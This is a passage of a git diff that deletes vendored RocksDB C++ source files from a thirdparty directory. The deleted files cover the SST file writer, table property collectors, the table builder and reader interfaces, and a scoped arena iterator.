-      // Use empty slice as prefix if prefix_extractor is not set.
-      // In that case,
-      // it falls back to pure binary search and
-      // total iterator seek is supported.
-      return Slice();
-    }
-  }
-
-  friend class TableCache;
-  friend class PlainTableIterator;
-
-  // Internal helper function to generate an IndexRecordList object from all
-  // the rows, which contains index records as a list.
-  // If bloom_ is not null, all the keys' full-key hash will be added to the
-  // bloom filter.
-  Status PopulateIndexRecordList(PlainTableIndexBuilder* index_builder,
-                                 vector<uint32_t>* prefix_hashes);
-
-  // Internal helper function to allocate memory for bloom filter and fill it
-  void AllocateAndFillBloom(int bloom_bits_per_key, int num_prefixes,
-                            size_t huge_page_tlb_size,
-                            vector<uint32_t>* prefix_hashes);
-
-  void FillBloom(vector<uint32_t>* prefix_hashes);
-
-  // Read the key and value at `offset` to parameters for keys, the and
-  // `seekable`.
-  // On success, `offset` will be updated as the offset for the next key.
-  // `parsed_key` will be key in parsed format.
-  // if `internal_key` is not empty, it will be filled with key with slice
-  // format.
-  // if `seekable` is not null, it will return whether we can directly read
-  // data using this offset.
-  Status Next(PlainTableKeyDecoder* decoder, uint32_t* offset,
-              ParsedInternalKey* parsed_key, Slice* internal_key, Slice* value,
-              bool* seekable = nullptr) const;
-  // Get file offset for key target.
-  // return value prefix_matched is set to true if the offset is confirmed
-  // for a key with the same prefix as target.
-  Status GetOffset(PlainTableKeyDecoder* decoder, const Slice& target,
-                   const Slice& prefix, uint32_t prefix_hash,
-                   bool& prefix_matched, uint32_t* offset) const;
-
-  bool IsTotalOrderMode() const { return (prefix_extractor_ == nullptr); }
-
-  // No copying allowed
-  explicit PlainTableReader(const TableReader&) = delete;
-  void operator=(const TableReader&) = delete;
-};
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/scoped_arena_iterator.h b/thirdparty/rocksdb/table/scoped_arena_iterator.h
deleted file mode 100644
index 1de570d..0000000
--- a/thirdparty/rocksdb/table/scoped_arena_iterator.h
+++ /dev/null
@@ -1,61 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include "table/internal_iterator.h"
-#include "port/port.h"
-
-namespace rocksdb {
-class ScopedArenaIterator {
-
-  void reset(InternalIterator* iter) ROCKSDB_NOEXCEPT {
-    if (iter_ != nullptr) {
-      iter_->~InternalIterator();
-    }
-    iter_ = iter;
-  }
-
- public:
-
-  explicit ScopedArenaIterator(InternalIterator* iter = nullptr)
-      : iter_(iter) {}
-
-  ScopedArenaIterator(const ScopedArenaIterator&) = delete;
-  ScopedArenaIterator& operator=(const ScopedArenaIterator&) = delete;
-
-  ScopedArenaIterator(ScopedArenaIterator&& o) ROCKSDB_NOEXCEPT {
-    iter_ = o.iter_;
-    o.iter_ = nullptr;
-  }
-
-  ScopedArenaIterator& operator=(ScopedArenaIterator&& o) ROCKSDB_NOEXCEPT {
-    reset(o.iter_);
-    o.iter_ = nullptr;
-    return *this;
-  }
-
-  InternalIterator* operator->() { return iter_; }
-  InternalIterator* get() { return iter_; }
-
-  void set(InternalIterator* iter) { reset(iter); }
-
-  InternalIterator* release() {
-    assert(iter_ != nullptr);
-    auto* res = iter_;
-    iter_ = nullptr;
-    return res;
-  }
-
-  ~ScopedArenaIterator() {
-    reset(nullptr);
-  }
-
- private:
-  InternalIterator* iter_;
-};
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/sst_file_writer.cc b/thirdparty/rocksdb/table/sst_file_writer.cc
deleted file mode 100644
index adcd91f..0000000
--- a/thirdparty/rocksdb/table/sst_file_writer.cc
+++ /dev/null
@@ -1,262 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/sst_file_writer.h"
-
-#include <vector>
-#include "db/dbformat.h"
-#include "rocksdb/table.h"
-#include "table/block_based_table_builder.h"
-#include "table/sst_file_writer_collectors.h"
-#include "util/file_reader_writer.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-const std::string ExternalSstFilePropertyNames::kVersion =
-    "rocksdb.external_sst_file.version";
-const std::string ExternalSstFilePropertyNames::kGlobalSeqno =
-    "rocksdb.external_sst_file.global_seqno";
-
-#ifndef ROCKSDB_LITE
-
-const size_t kFadviseTrigger = 1024 * 1024; // 1MB
-
-struct SstFileWriter::Rep {
-  Rep(const EnvOptions& _env_options, const Options& options,
-      Env::IOPriority _io_priority, const Comparator* _user_comparator,
-      ColumnFamilyHandle* _cfh, bool _invalidate_page_cache)
-      : env_options(_env_options),
-        ioptions(options),
-        mutable_cf_options(options),
-        io_priority(_io_priority),
-        internal_comparator(_user_comparator),
-        cfh(_cfh),
-        invalidate_page_cache(_invalidate_page_cache),
-        last_fadvise_size(0) {}
-
-  std::unique_ptr<WritableFileWriter> file_writer;
-  std::unique_ptr<TableBuilder> builder;
-  EnvOptions env_options;
-  ImmutableCFOptions ioptions;
-  MutableCFOptions mutable_cf_options;
-  Env::IOPriority io_priority;
-  InternalKeyComparator internal_comparator;
-  ExternalSstFileInfo file_info;
-  InternalKey ikey;
-  std::string column_family_name;
-  ColumnFamilyHandle* cfh;
-  // If true, We will give the OS a hint that this file pages is not needed
-  // everytime we write 1MB to the file.
-  bool invalidate_page_cache;
-  // The size of the file during the last time we called Fadvise to remove
-  // cached pages from page cache.
-  uint64_t last_fadvise_size;
-  Status Add(const Slice& user_key, const Slice& value,
-             const ValueType value_type) {
-    if (!builder) {
-      return Status::InvalidArgument("File is not opened");
-    }
-
-    if (file_info.num_entries == 0) {
-      file_info.smallest_key.assign(user_key.data(), user_key.size());
-    } else {
-      if (internal_comparator.user_comparator()->Compare(
-              user_key, file_info.largest_key) <= 0) {
-        // Make sure that keys are added in order
-        return Status::InvalidArgument("Keys must be added in order");
-      }
-    }
-
-    // TODO(tec) : For external SST files we could omit the seqno and type.
-    switch (value_type) {
-      case ValueType::kTypeValue:
-        ikey.Set(user_key, 0 /* Sequence Number */,
-                 ValueType::kTypeValue /* Put */);
-        break;
-      case ValueType::kTypeMerge:
-        ikey.Set(user_key, 0 /* Sequence Number */,
-                 ValueType::kTypeMerge /* Merge */);
-        break;
-      case ValueType::kTypeDeletion:
-        ikey.Set(user_key, 0 /* Sequence Number */,
-                 ValueType::kTypeDeletion /* Delete */);
-        break;
-      default:
-        return Status::InvalidArgument("Value type is not supported");
-    }
-    builder->Add(ikey.Encode(), value);
-
-    // update file info
-    file_info.num_entries++;
-    file_info.largest_key.assign(user_key.data(), user_key.size());
-    file_info.file_size = builder->FileSize();
-
-    InvalidatePageCache(false /* closing */);
-
-    return Status::OK();
-  }
-
-  void InvalidatePageCache(bool closing) {
-    if (invalidate_page_cache == false) {
-      // Fadvise disabled
-      return;
-    }
-    uint64_t bytes_since_last_fadvise =
-      builder->FileSize() - last_fadvise_size;
-    if (bytes_since_last_fadvise > kFadviseTrigger || closing) {
-      TEST_SYNC_POINT_CALLBACK("SstFileWriter::Rep::InvalidatePageCache",
-                               &(bytes_since_last_fadvise));
-      // Tell the OS that we dont need this file in page cache
-      file_writer->InvalidateCache(0, 0);
-      last_fadvise_size = builder->FileSize();
-    }
-  }
-
-};
-
-SstFileWriter::SstFileWriter(const EnvOptions& env_options,
-                             const Options& options,
-                             const Comparator* user_comparator,
-                             ColumnFamilyHandle* column_family,
-                             bool invalidate_page_cache,
-                             Env::IOPriority io_priority)
-    : rep_(new Rep(env_options, options, io_priority, user_comparator,
-                   column_family, invalidate_page_cache)) {
-  rep_->file_info.file_size = 0;
-}
-
-SstFileWriter::~SstFileWriter() {
-  if (rep_->builder) {
-    // User did not call Finish() or Finish() failed, we need to
-    // abandon the builder.
-    rep_->builder->Abandon();
-  }
-}
-
-Status SstFileWriter::Open(const std::string& file_path) {
-  Rep* r = rep_.get();
-  Status s;
-  std::unique_ptr<WritableFile> sst_file;
-  s = r->ioptions.env->NewWritableFile(file_path, &sst_file, r->env_options);
-  if (!s.ok()) {
-    return s;
-  }
-
-  sst_file->SetIOPriority(r->io_priority);
-
-  CompressionType compression_type;
-  if (r->ioptions.bottommost_compression != kDisableCompressionOption) {
-    compression_type = r->ioptions.bottommost_compression;
-  } else if (!r->ioptions.compression_per_level.empty()) {
-    // Use the compression of the last level if we have per level compression
-    compression_type = *(r->ioptions.compression_per_level.rbegin());
-  } else {
-    compression_type = r->mutable_cf_options.compression;
-  }
-
-  std::vector<std::unique_ptr<IntTblPropCollectorFactory>>
-      int_tbl_prop_collector_factories;
-
-  // SstFileWriter properties collector to add SstFileWriter version.
-  int_tbl_prop_collector_factories.emplace_back(
-      new SstFileWriterPropertiesCollectorFactory(2 /* version */,
-                                                  0 /* global_seqno*/));
-
-  // User collector factories
-  auto user_collector_factories =
-      r->ioptions.table_properties_collector_factories;
-  for (size_t i = 0; i < user_collector_factories.size(); i++) {
-    int_tbl_prop_collector_factories.emplace_back(
-        new UserKeyTablePropertiesCollectorFactory(
-            user_collector_factories[i]));
-  }
-  int unknown_level = -1;
-  uint32_t cf_id;
-
-  if (r->cfh != nullptr) {
-    // user explicitly specified that this file will be ingested into cfh,
-    // we can persist this information in the file.
-    cf_id = r->cfh->GetID();
-    r->column_family_name = r->cfh->GetName();
-  } else {
-    r->column_family_name = "";
-    cf_id = TablePropertiesCollectorFactory::Context::kUnknownColumnFamily;
-  }
-
-  TableBuilderOptions table_builder_options(
-      r->ioptions, r->internal_comparator, &int_tbl_prop_collector_factories,
-      compression_type, r->ioptions.compression_opts,
-      nullptr /* compression_dict */, false /* skip_filters */,
-      r->column_family_name, unknown_level);
-  r->file_writer.reset(
-      new WritableFileWriter(std::move(sst_file), r->env_options));
-
-  // TODO(tec) : If table_factory is using compressed block cache, we will
-  // be adding the external sst file blocks into it, which is wasteful.
-  r->builder.reset(r->ioptions.table_factory->NewTableBuilder(
-      table_builder_options, cf_id, r->file_writer.get()));
-
-  r->file_info.file_path = file_path;
-  r->file_info.file_size = 0;
-  r->file_info.num_entries = 0;
-  r->file_info.sequence_number = 0;
-  r->file_info.version = 2;
-  return s;
-}
-
-Status SstFileWriter::Add(const Slice& user_key, const Slice& value) {
-  return rep_->Add(user_key, value, ValueType::kTypeValue);
-}
-
-Status SstFileWriter::Put(const Slice& user_key, const Slice& value) {
-  return rep_->Add(user_key, value, ValueType::kTypeValue);
-}
-
-Status SstFileWriter::Merge(const Slice& user_key, const Slice& value) {
-  return rep_->Add(user_key, value, ValueType::kTypeMerge);
-}
-
-Status SstFileWriter::Delete(const Slice& user_key) {
-  return rep_->Add(user_key, Slice(), ValueType::kTypeDeletion);
-}
-
-Status SstFileWriter::Finish(ExternalSstFileInfo* file_info) {
-  Rep* r = rep_.get();
-  if (!r->builder) {
-    return Status::InvalidArgument("File is not opened");
-  }
-  if (r->file_info.num_entries == 0) {
-    return Status::InvalidArgument("Cannot create sst file with no entries");
-  }
-
-  Status s = r->builder->Finish();
-  r->file_info.file_size = r->builder->FileSize();
-
-  if (s.ok()) {
-    s = r->file_writer->Sync(r->ioptions.use_fsync);
-    r->InvalidatePageCache(true /* closing */);
-    if (s.ok()) {
-      s = r->file_writer->Close();
-    }
-  }
-  if (!s.ok()) {
-    r->ioptions.env->DeleteFile(r->file_info.file_path);
-  }
-
-  if (file_info != nullptr) {
-    *file_info = r->file_info;
-  }
-
-  r->builder.reset();
-  return s;
-}
-
-uint64_t SstFileWriter::FileSize() {
-  return rep_->file_info.file_size;
-}
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/sst_file_writer_collectors.h b/thirdparty/rocksdb/table/sst_file_writer_collectors.h
deleted file mode 100644
index ce3a45f..0000000
--- a/thirdparty/rocksdb/table/sst_file_writer_collectors.h
+++ /dev/null
@@ -1,84 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include <string>
-#include "rocksdb/types.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-// Table Properties that are specific to tables created by SstFileWriter.
-struct ExternalSstFilePropertyNames {
-  // value of this property is a fixed uint32 number.
-  static const std::string kVersion;
-  // value of this property is a fixed uint64 number.
-  static const std::string kGlobalSeqno;
-};
-
-// PropertiesCollector used to add properties specific to tables
-// generated by SstFileWriter
-class SstFileWriterPropertiesCollector : public IntTblPropCollector {
- public:
-  explicit SstFileWriterPropertiesCollector(int32_t version,
-                                            SequenceNumber global_seqno)
-      : version_(version), global_seqno_(global_seqno) {}
-
-  virtual Status InternalAdd(const Slice& key, const Slice& value,
-                             uint64_t file_size) override {
-    // Intentionally left blank. Have no interest in collecting stats for
-    // individual key/value pairs.
-    return Status::OK();
-  }
-
-  virtual Status Finish(UserCollectedProperties* properties) override {
-    // File version
-    std::string version_val;
-    PutFixed32(&version_val, static_cast<uint32_t>(version_));
-    properties->insert({ExternalSstFilePropertyNames::kVersion, version_val});
-
-    // Global Sequence number
-    std::string seqno_val;
-    PutFixed64(&seqno_val, static_cast<uint64_t>(global_seqno_));
-    properties->insert({ExternalSstFilePropertyNames::kGlobalSeqno, seqno_val});
-
-    return Status::OK();
-  }
-
-  virtual const char* Name() const override {
-    return "SstFileWriterPropertiesCollector";
-  }
-
-  virtual UserCollectedProperties GetReadableProperties() const override {
-    return {{ExternalSstFilePropertyNames::kVersion, ToString(version_)}};
-  }
-
- private:
-  int32_t version_;
-  SequenceNumber global_seqno_;
-};
-
-class SstFileWriterPropertiesCollectorFactory
-    : public IntTblPropCollectorFactory {
- public:
-  explicit SstFileWriterPropertiesCollectorFactory(int32_t version,
-                                                   SequenceNumber global_seqno)
-      : version_(version), global_seqno_(global_seqno) {}
-
-  virtual IntTblPropCollector* CreateIntTblPropCollector(
-      uint32_t column_family_id) override {
-    return new SstFileWriterPropertiesCollector(version_, global_seqno_);
-  }
-
-  virtual const char* Name() const override {
-    return "SstFileWriterPropertiesCollector";
-  }
-
- private:
-  int32_t version_;
-  SequenceNumber global_seqno_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/table_builder.h b/thirdparty/rocksdb/table/table_builder.h
deleted file mode 100644
index e5e7d6e..0000000
--- a/thirdparty/rocksdb/table/table_builder.h
+++ /dev/null
@@ -1,130 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <stdint.h>
-#include <string>
-#include <utility>
-#include <vector>
-#include "db/table_properties_collector.h"
-#include "options/cf_options.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table_properties.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-
-class Slice;
-class Status;
-
-struct TableReaderOptions {
-  // @param skip_filters Disables loading/accessing the filter block
-  TableReaderOptions(const ImmutableCFOptions& _ioptions,
-                     const EnvOptions& _env_options,
-                     const InternalKeyComparator& _internal_comparator,
-                     bool _skip_filters = false, int _level = -1)
-      : ioptions(_ioptions),
-        env_options(_env_options),
-        internal_comparator(_internal_comparator),
-        skip_filters(_skip_filters),
-        level(_level) {}
-
-  const ImmutableCFOptions& ioptions;
-  const EnvOptions& env_options;
-  const InternalKeyComparator& internal_comparator;
-  // This is only used for BlockBasedTable (reader)
-  bool skip_filters;
-  // what level this table/file is on, -1 for "not set, don't know"
-  int level;
-};
-
-struct TableBuilderOptions {
-  TableBuilderOptions(
-      const ImmutableCFOptions& _ioptions,
-      const InternalKeyComparator& _internal_comparator,
-      const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-          _int_tbl_prop_collector_factories,
-      CompressionType _compression_type,
-      const CompressionOptions& _compression_opts,
-      const std::string* _compression_dict, bool _skip_filters,
-      const std::string& _column_family_name, int _level,
-      const uint64_t _creation_time = 0, const int64_t _oldest_key_time = 0)
-      : ioptions(_ioptions),
-        internal_comparator(_internal_comparator),
-        int_tbl_prop_collector_factories(_int_tbl_prop_collector_factories),
-        compression_type(_compression_type),
-        compression_opts(_compression_opts),
-        compression_dict(_compression_dict),
-        skip_filters(_skip_filters),
-        column_family_name(_column_family_name),
-        level(_level),
-        creation_time(_creation_time),
-        oldest_key_time(_oldest_key_time) {}
-  const ImmutableCFOptions& ioptions;
-  const InternalKeyComparator& internal_comparator;
-  const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-      int_tbl_prop_collector_factories;
-  CompressionType compression_type;
-  const CompressionOptions& compression_opts;
-  // Data for presetting the compression library's dictionary, or nullptr.
-  const std::string* compression_dict;
-  bool skip_filters;  // only used by BlockBasedTableBuilder
-  const std::string& column_family_name;
-  int level; // what level this table/file is on, -1 for "not set, don't know"
-  const uint64_t creation_time;
-  const int64_t oldest_key_time;
-};
-
-// TableBuilder provides the interface used to build a Table
-// (an immutable and sorted map from keys to values).
-//
-// Multiple threads can invoke const methods on a TableBuilder without
-// external synchronization, but if any of the threads may call a
-// non-const method, all threads accessing the same TableBuilder must use
-// external synchronization.
-class TableBuilder {
- public:
-  // REQUIRES: Either Finish() or Abandon() has been called.
-  virtual ~TableBuilder() {}
-
-  // Add key,value to the table being constructed.
-  // REQUIRES: key is after any previously added key according to comparator.
-  // REQUIRES: Finish(), Abandon() have not been called
-  virtual void Add(const Slice& key, const Slice& value) = 0;
-
-  // Return non-ok iff some error has been detected.
-  virtual Status status() const = 0;
-
-  // Finish building the table.
-  // REQUIRES: Finish(), Abandon() have not been called
-  virtual Status Finish() = 0;
-
-  // Indicate that the contents of this builder should be abandoned.
-  // If the caller is not going to call Finish(), it must call Abandon()
-  // before destroying this builder.
-  // REQUIRES: Finish(), Abandon() have not been called
-  virtual void Abandon() = 0;
-
-  // Number of calls to Add() so far.
-  virtual uint64_t NumEntries() const = 0;
-
-  // Size of the file generated so far.  If invoked after a successful
-  // Finish() call, returns the size of the final generated file.
-  virtual uint64_t FileSize() const = 0;
-
-  // If the user defined table properties collector suggest the file to
-  // be further compacted.
-  virtual bool NeedCompact() const { return false; }
-
-  // Returns table properties
-  virtual TableProperties GetTableProperties() const = 0;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/table_properties.cc b/thirdparty/rocksdb/table/table_properties.cc
deleted file mode 100644
index 24453f6..0000000
--- a/thirdparty/rocksdb/table/table_properties.cc
+++ /dev/null
@@ -1,227 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/table_properties.h"
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "table/block.h"
-#include "table/internal_iterator.h"
-#include "table/table_properties_internal.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-const uint32_t TablePropertiesCollectorFactory::Context::kUnknownColumnFamily =
-    port::kMaxInt32;
-
-namespace {
-  void AppendProperty(
-      std::string& props,
-      const std::string& key,
-      const std::string& value,
-      const std::string& prop_delim,
-      const std::string& kv_delim) {
-    props.append(key);
-    props.append(kv_delim);
-    props.append(value);
-    props.append(prop_delim);
-  }
-
-  template <class TValue>
-  void AppendProperty(
-      std::string& props,
-      const std::string& key,
-      const TValue& value,
-      const std::string& prop_delim,
-      const std::string& kv_delim) {
-    AppendProperty(
-        props, key, ToString(value), prop_delim, kv_delim
-    );
-  }
-
-  // Seek to the specified meta block.
-  // Return true if it successfully seeks to that block.
-  Status SeekToMetaBlock(InternalIterator* meta_iter,
-                         const std::string& block_name, bool* is_found,
-                         BlockHandle* block_handle = nullptr) {
-    if (block_handle != nullptr) {
-      *block_handle = BlockHandle::NullBlockHandle();
-    }
-    *is_found = true;
-    meta_iter->Seek(block_name);
-    if (meta_iter->status().ok()) {
-      if (meta_iter->Valid() && meta_iter->key() == block_name) {
-        *is_found = true;
-        if (block_handle) {
-          Slice v = meta_iter->value();
-          return block_handle->DecodeFrom(&v);
-        }
-      } else {
-        *is_found = false;
-        return Status::OK();
-      }
-    }
-    return meta_iter->status();
-  }
-}
-
-std::string TableProperties::ToString(
-    const std::string& prop_delim,
-    const std::string& kv_delim) const {
-  std::string result;
-  result.reserve(1024);
-
-  // Basic Info
-  AppendProperty(result, "# data blocks", num_data_blocks, prop_delim,
-                 kv_delim);
-  AppendProperty(result, "# entries", num_entries, prop_delim, kv_delim);
-
-  AppendProperty(result, "raw key size", raw_key_size, prop_delim, kv_delim);
-  AppendProperty(result, "raw average key size",
-                 num_entries != 0 ? 1.0 * raw_key_size / num_entries : 0.0,
-                 prop_delim, kv_delim);
-  AppendProperty(result, "raw value size", raw_value_size, prop_delim,
-                 kv_delim);
-  AppendProperty(result, "raw average value size",
-                 num_entries != 0 ? 1.0 * raw_value_size / num_entries : 0.0,
-                 prop_delim, kv_delim);
-
-  AppendProperty(result, "data block size", data_size, prop_delim, kv_delim);
-  AppendProperty(result, "index block size", index_size, prop_delim, kv_delim);
-  if (index_partitions != 0) {
-    AppendProperty(result, "# index partitions", index_partitions, prop_delim,
-                   kv_delim);
-    AppendProperty(result, "top-level index size", top_level_index_size, prop_delim,
-                   kv_delim);
-  }
-  AppendProperty(result, "filter block size", filter_size, prop_delim,
-                 kv_delim);
-  AppendProperty(result, "(estimated) table size",
-                 data_size + index_size + filter_size, prop_delim, kv_delim);
-
-  AppendProperty(
-      result, "filter policy name",
-      filter_policy_name.empty() ? std::string("N/A") : filter_policy_name,
-      prop_delim, kv_delim);
-
-  AppendProperty(result, "column family ID",
-                 column_family_id == rocksdb::TablePropertiesCollectorFactory::
-                                         Context::kUnknownColumnFamily
-                     ? std::string("N/A")
-                     : rocksdb::ToString(column_family_id),
-                 prop_delim, kv_delim);
-  AppendProperty(
-      result, "column family name",
-      column_family_name.empty() ? std::string("N/A") : column_family_name,
-      prop_delim, kv_delim);
-
-  AppendProperty(result, "comparator name",
-                 comparator_name.empty() ? std::string("N/A") : comparator_name,
-                 prop_delim, kv_delim);
-
-  AppendProperty(
-      result, "merge operator name",
-      merge_operator_name.empty() ? std::string("N/A") : merge_operator_name,
-      prop_delim, kv_delim);
-
-  AppendProperty(result, "property collectors names",
-                 property_collectors_names.empty() ? std::string("N/A")
-                                                   : property_collectors_names,
-                 prop_delim, kv_delim);
-
-  AppendProperty(
-      result, "SST file compression algo",
-      compression_name.empty() ? std::string("N/A") : compression_name,
-      prop_delim, kv_delim);
-
-  AppendProperty(result, "creation time", creation_time, prop_delim, kv_delim);
-
-  AppendProperty(result, "time stamp of earliest key", oldest_key_time,
-                 prop_delim, kv_delim);
-
-  return result;
-}
-
-void TableProperties::Add(const TableProperties& tp) {
-  data_size += tp.data_size;
-  index_size += tp.index_size;
-  index_partitions += tp.index_partitions;
-  top_level_index_size += tp.top_level_index_size;
-  filter_size += tp.filter_size;
-  raw_key_size += tp.raw_key_size;
-  raw_value_size += tp.raw_value_size;
-  num_data_blocks += tp.num_data_blocks;
-  num_entries += tp.num_entries;
-}
-
-const std::string TablePropertiesNames::kDataSize  =
-    "rocksdb.data.size";
-const std::string TablePropertiesNames::kIndexSize =
-    "rocksdb.index.size";
-const std::string TablePropertiesNames::kIndexPartitions =
-    "rocksdb.index.partitions";
-const std::string TablePropertiesNames::kTopLevelIndexSize =
-    "rocksdb.top-level.index.size";
-const std::string TablePropertiesNames::kFilterSize =
-    "rocksdb.filter.size";
-const std::string TablePropertiesNames::kRawKeySize =
-    "rocksdb.raw.key.size";
-const std::string TablePropertiesNames::kRawValueSize =
-    "rocksdb.raw.value.size";
-const std::string TablePropertiesNames::kNumDataBlocks =
-    "rocksdb.num.data.blocks";
-const std::string TablePropertiesNames::kNumEntries =
-    "rocksdb.num.entries";
-const std::string TablePropertiesNames::kFilterPolicy =
-    "rocksdb.filter.policy";
-const std::string TablePropertiesNames::kFormatVersion =
-    "rocksdb.format.version";
-const std::string TablePropertiesNames::kFixedKeyLen =
-    "rocksdb.fixed.key.length";
-const std::string TablePropertiesNames::kColumnFamilyId =
-    "rocksdb.column.family.id";
-const std::string TablePropertiesNames::kColumnFamilyName =
-    "rocksdb.column.family.name";
-const std::string TablePropertiesNames::kComparator = "rocksdb.comparator";
-const std::string TablePropertiesNames::kMergeOperator =
-    "rocksdb.merge.operator";
-const std::string TablePropertiesNames::kPrefixExtractorName =
-    "rocksdb.prefix.extractor.name";
-const std::string TablePropertiesNames::kPropertyCollectors =
-    "rocksdb.property.collectors";
-const std::string TablePropertiesNames::kCompression = "rocksdb.compression";
-const std::string TablePropertiesNames::kCreationTime = "rocksdb.creation.time";
-const std::string TablePropertiesNames::kOldestKeyTime =
-    "rocksdb.oldest.key.time";
-
-extern const std::string kPropertiesBlock = "rocksdb.properties";
-// Old property block name for backward compatibility
-extern const std::string kPropertiesBlockOldName = "rocksdb.stats";
-extern const std::string kCompressionDictBlock = "rocksdb.compression_dict";
-extern const std::string kRangeDelBlock = "rocksdb.range_del";
-
-// Seek to the properties block.
-// Return true if it successfully seeks to the properties block.
-Status SeekToPropertiesBlock(InternalIterator* meta_iter, bool* is_found) {
-  Status status = SeekToMetaBlock(meta_iter, kPropertiesBlock, is_found);
-  if (!*is_found && status.ok()) {
-    status = SeekToMetaBlock(meta_iter, kPropertiesBlockOldName, is_found);
-  }
-  return status;
-}
-
-// Seek to the compression dictionary block.
-// Return true if it successfully seeks to that block.
-Status SeekToCompressionDictBlock(InternalIterator* meta_iter, bool* is_found) {
-  return SeekToMetaBlock(meta_iter, kCompressionDictBlock, is_found);
-}
-
-Status SeekToRangeDelBlock(InternalIterator* meta_iter, bool* is_found,
-                           BlockHandle* block_handle = nullptr) {
-  return SeekToMetaBlock(meta_iter, kRangeDelBlock, is_found, block_handle);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/table_properties_internal.h b/thirdparty/rocksdb/table/table_properties_internal.h
deleted file mode 100644
index 2a89427..0000000
--- a/thirdparty/rocksdb/table/table_properties_internal.h
+++ /dev/null
@@ -1,30 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include "rocksdb/status.h"
-#include "rocksdb/iterator.h"
-
-namespace rocksdb {
-
-class InternalIterator;
-class BlockHandle;
-
-// Seek to the properties block.
-// If it successfully seeks to the properties block, "is_found" will be
-// set to true.
-Status SeekToPropertiesBlock(InternalIterator* meta_iter, bool* is_found);
-
-// Seek to the compression dictionary block.
-// If it successfully seeks to the properties block, "is_found" will be
-// set to true.
-Status SeekToCompressionDictBlock(InternalIterator* meta_iter, bool* is_found);
-
-// TODO(andrewkr) should not put all meta block in table_properties.h/cc
-Status SeekToRangeDelBlock(InternalIterator* meta_iter, bool* is_found,
-                           BlockHandle* block_handle);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/table_reader.h b/thirdparty/rocksdb/table/table_reader.h
deleted file mode 100644
index 18fcda2..0000000
--- a/thirdparty/rocksdb/table/table_reader.h
+++ /dev/null
@@ -1,109 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <memory>
-#include "table/internal_iterator.h"
-
-namespace rocksdb {
-
-class Iterator;
-struct ParsedInternalKey;
-class Slice;
-class Arena;
-struct ReadOptions;
-struct TableProperties;
-class GetContext;
-class InternalIterator;
-
-// A Table is a sorted map from strings to strings.  Tables are
-// immutable and persistent.  A Table may be safely accessed from
-// multiple threads without external synchronization.
-class TableReader {
- public:
-  virtual ~TableReader() {}
-
-  // Returns a new iterator over the table contents.
-  // The result of NewIterator() is initially invalid (caller must
-  // call one of the Seek methods on the iterator before using it).
-  // arena: If not null, the arena needs to be used to allocate the Iterator.
-  //        When destroying the iterator, the caller will not call "delete"
-  //        but Iterator::~Iterator() directly. The destructor needs to destroy
-  //        all the states but those allocated in arena.
-  // skip_filters: disables checking the bloom filters even if they exist. This
-  //               option is effective only for block-based table format.
-  virtual InternalIterator* NewIterator(const ReadOptions&,
-                                        Arena* arena = nullptr,
-                                        bool skip_filters = false) = 0;
-
-  virtual InternalIterator* NewRangeTombstoneIterator(
-      const ReadOptions& read_options) {
-    return nullptr;
-  }
-
-  // Given a key, return an approximate byte offset in the file where
-  // the data for that key begins (or would begin if the key were
-  // present in the file).  The returned value is in terms of file
-  // bytes, and so includes effects like compression of the underlying data.
-  // E.g., the approximate offset of the last key in the table will
-  // be close to the file length.
-  virtual uint64_t ApproximateOffsetOf(const Slice& key) = 0;
-
-  // Set up the table for Compaction. Might change some parameters with
